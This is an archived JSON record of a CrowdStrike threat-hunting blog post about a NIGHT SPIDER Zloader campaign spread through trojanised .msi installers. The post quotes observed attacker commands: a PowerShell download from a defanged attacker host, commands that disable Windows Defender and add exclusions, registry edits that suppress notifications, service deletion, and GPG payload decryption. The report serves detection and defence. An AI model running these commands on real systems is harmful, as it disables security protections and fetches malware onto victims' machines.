{
	"id": "a438b099-4fc3-4e89-9f6c-8960ef69a47b",
	"created_at": "2026-04-06T00:15:12.762494Z",
	"updated_at": "2026-04-10T03:21:11.347668Z",
	"deleted_at": null,
	"sha1_hash": "67ec3863d63116c62fba506d0777b78efb13c6fe",
	"title": "OverWatch Uncovers Ongoing NIGHT SPIDER Zloader Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 131366,
	"plain_text": "OverWatch Uncovers Ongoing NIGHT SPIDER Zloader\r\nCampaign\r\nBy falcon.overwatch.team\r\nArchived: 2026-04-05 17:01:12 UTC\r\nOver recent months, the CrowdStrike Falcon® OverWatch™ team has tracked an ongoing, widespread intrusion\r\ncampaign leveraging bundled .msi installers to trick victims into downloading malicious payloads alongside\r\nlegitimate software. These payloads and scripts were used to perform reconnaissance and ultimately download and\r\nexecute NIGHT SPIDER's Zloader trojan, as detailed in CrowdStrike CROWDSTRIKE FALCON®\r\nINTELLIGENCE™ Premium reporting. This blog shows how OverWatch went about tracking and alerting\r\ncustomers to this activity, despite the adversary’s attempts to evade detection.\r\nAttempts to Hide Prove to Be the Key to Being Found\r\nWhether it’s adopting new tools or new techniques, adversaries continuously iterate their operations in an effort to\r\nstay a step ahead of defenders. What sets OverWatch apart is its focus on detecting exactly this type of anomalous\r\nactivity rather than relying on atomic and static indicators to look for known threats.\r\nLate in 2021, OverWatch detected a wave of activity leveraging bundled .msi installers to execute scripts and\r\nremotely download additional malicious payloads. The initial installers were masquerading as legitimate Zoom,\r\nAtera, NetSupport, Brave Browser, JavaPlugin and TeamViewer installers, but the programs were also packaged\r\nwith malicious scripts and payloads to perform automated reconnaissance and download the Zloader trojan, and in\r\nsome cases, Cobalt Strike. The adversary’s use of evasive techniques was ultimately what enabled OverWatch to\r\nquickly zero in on these attempted intrusions.\r\nFigure 1. 
Process tree that shows OverWatch detection of Launcher.exe executing malicious scripts, remotely\r\ndownloading additional payloads and leveraging native utilities\r\nhttps://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/\r\nPage 1 of 4\n\nOverWatch’s detective capability against this campaign can be attributed to three pillars of analysis that threat\r\nhunters use to rapidly assess hunting leads: behavior, prevalence and timing. In the case of this campaign,\r\nOverWatch uncovered suspicious behaviors associated with the use of native utilities, the presence of low-prevalence files and the coincidence of both of these in a short time period impacting several customers. In fact, it\r\nwas the adversary’s attempts to evade detection that so quickly caught OverWatch’s attention. The list that follows\r\noutlines the suspicious behaviors that OverWatch observed in the analyzed Zloader campaign, which was\r\ndeveloped by NIGHT SPIDER. The list also shows example command lines related to these behaviors.\r\nNumerous unknown scripts spawned from a low-prevalence binary packaged in high-prevalence .msi files\r\nwith well-known names (Team Viewer, Zoom, NetSupport Manager, Atera, Brave Browser, JavaPlugin)\r\nand legitimate hashes. \r\nThe Microsoft Windows command or wscript utility used PowerShell to beacon to the internet and\r\nremotely download a payload.\r\npowershell  Invoke-WebRequest https[:]//clouds222[.]com/t1m/index/processingSetRequestBat2/?\r\nservername=msi -OutFile flash.bat\r\nThe downloaded payload was a low-prevalence file.\r\nThe scripts used the Windows-native Mshta utility or PowerShell to impair Windows Defender. 
\r\nPowershell.exe -command “Set-MpPreference -DisableIOAVProtection $true”\r\npowershell.exe  -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\\Users\\User\\AppData\\Roaming*'\r\nThe scripts used PowerShell in an attempt to bypass Microsoft’s AntiMalware Scan Interface (AMSI).\r\nThe adminpriv.exe utility was used in an attempt to manipulate registry values.\r\nadminpriv  -U:T -ShowWindowMode:Hide reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows\r\nDefender\\UX Configuration\"  /v \"Notification_Suppress\" /t REG_DWORD /d \"1\" /f\r\nadminpriv  -U:T -ShowWindowMode:Hide  sc delete  windefend\r\nMSIEXEC was used in an unusual manner to manipulate registry entries that would suggest process abuse.\r\nA script was used to issue a sleep command and decrypt a payload using the legitimate GPG software. The\r\nsame password was observed at various customers.\r\n\"C:\\Users\\[User]\\AppData\\Local\\Temp\\WScriptSleeper.vbs\" 45000\r\nCMD: PowerShell -NoProfile -ExecutionPolicy Bypass -command Import-Module GnuPg;\r\nRemove-Encryption -FolderPath C:\\Users\\[REDACTED]\\AppData\\Roaming -Password\r\n[REDACTED]\r\nCMD: \"C:\\Program Files (x86)\\GNU\\GnuPG\\gpg2.exe\" --batch --yes --passphrase [REDACTED] -\r\no C:\\Users\\[REDACTED]\\AppData\\Roaming\\zoom.dll -d C:\\Users\\\r\n[REDACTED]\\AppData\\Roaming\\zoom.dll.gpg\r\nThree Pillars of Rapid Assessment: Behavior, Prevalence and Timing\r\nOverWatch hunts for the last 1% of malicious activity that seeks to evade technology-based defenses. To achieve\r\nthis, threat hunters must build a picture not just from one or two data points, but by carefully piecing together a\r\nmyriad of subtle clues when something doesn’t look quite right.\r\n1. OverWatch hunts for unexpected behaviors stemming from otherwise mundane or routine actions. 
This\r\nmeans threat hunters need a deep familiarity with the wide variety of processes, applications, operating\r\nsystems, configurations, network communications and network architectures that represent the sum of\r\nnormal day-to-day operations. Similarly, hunters need a deep understanding of adversary tradecraft,\r\nexploits and the way that normal day-to-day operations can be manipulated for malicious purposes. This\r\nbreadth and depth of knowledge means that hunters can rapidly identify anomalous behaviors by\r\nidentifying activity that does not align with expected intent or functionality of a system. In the case of the\r\nbundled installer campaign, OverWatch observed an unidentified file attempting to bypass security on\r\nmore than one occasion, which immediately stood out as unusual. \r\n2. Prevalence also plays an important role in threat hunting, as low-prevalence behaviors can be indicative of\r\na system being used for unintended purposes. CrowdStrike Threat Graph® provides OverWatch with real-time visibility across the entire Falcon platform install base, while patented tooling enables threat hunters\r\nto immediately pivot on an indicator to determine whether it is common or not — not just within one\r\nenvironment but across all environments. In scenarios where there is suspicious behavior coupled with\r\nlow-prevalence indicators, these two pillars provide circumstantial findings to inform hunters’ analysis.\r\n3. Time is the third pillar of threat hunting. Suspicious behavior and low-prevalence indicators, all uncovered\r\nin a short period of time sound alarm bells for threat hunters. This trifecta of activity can often indicate\r\nsuccessful targeted phishing attempts, new campaigns or the active exploitation of a zero-day in an\r\napplication. 
In the example of the Zloader malicious installer campaign, OverWatch’s extensive data and\r\nfinely tuned hunting leads effectively identified the coincidence of 8-10 suspicious behaviors all within\r\nseconds of each other. This left hunters in no doubt that the activity was malicious and enabled them to\r\nsend timely and high-fidelity notifications to the victim organizations. \r\nNowhere to Hide for NIGHT SPIDER\r\nThe powerful combination of the vast telemetry of the CrowdStrike Security Cloud and OverWatch’s patented\r\nhunting workflows and expert threat hunters enabled the rapid identification of NIGHT SPIDER’s Zloader\r\ncampaign. The threat actor’s attempts to avoid detection caught the attention of threat hunters who were able to\r\nquickly piece together the evidence of a campaign in progress. Early detection of campaigns such as this enables\r\nOverWatch to provide organizations with early warning about threats to their environment and empowers\r\norganizations to remediate before any significant damage is done.\r\nAdditional Resources\r\nRead the 2021 Threat Hunting Report blog or download the report now.\r\nLearn more about Falcon OverWatch’s proactive managed threat hunting.\r\nDiscover the power of tailored threat hunting OverWatch Elite provides customers in this blog post.\r\nWatch how Falcon OverWatch proactively hunts for threats in your environment.\r\nLearn more about CrowdStrike Falcon® Intelligence Premium cyber threat intelligence.\r\nRead more about how part-time threat hunting is simply not enough in this blog post.\r\nLearn more about the CrowdStrike Falcon® platform.\r\nSource: https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.crowdstrike.com/blog/falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign/"
	],
	"report_names": [
		"falcon-overwatch-uncovers-ongoing-night-spider-zloader-campaign"
	],
	"threat_actors": [],
	"ts_created_at": 1775434512,
	"ts_updated_at": 1775791271,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/67ec3863d63116c62fba506d0777b78efb13c6fe.pdf",
		"text": "https://archive.orkl.eu/67ec3863d63116c62fba506d0777b78efb13c6fe.txt",
		"img": "https://archive.orkl.eu/67ec3863d63116c62fba506d0777b78efb13c6fe.jpg"
	}
}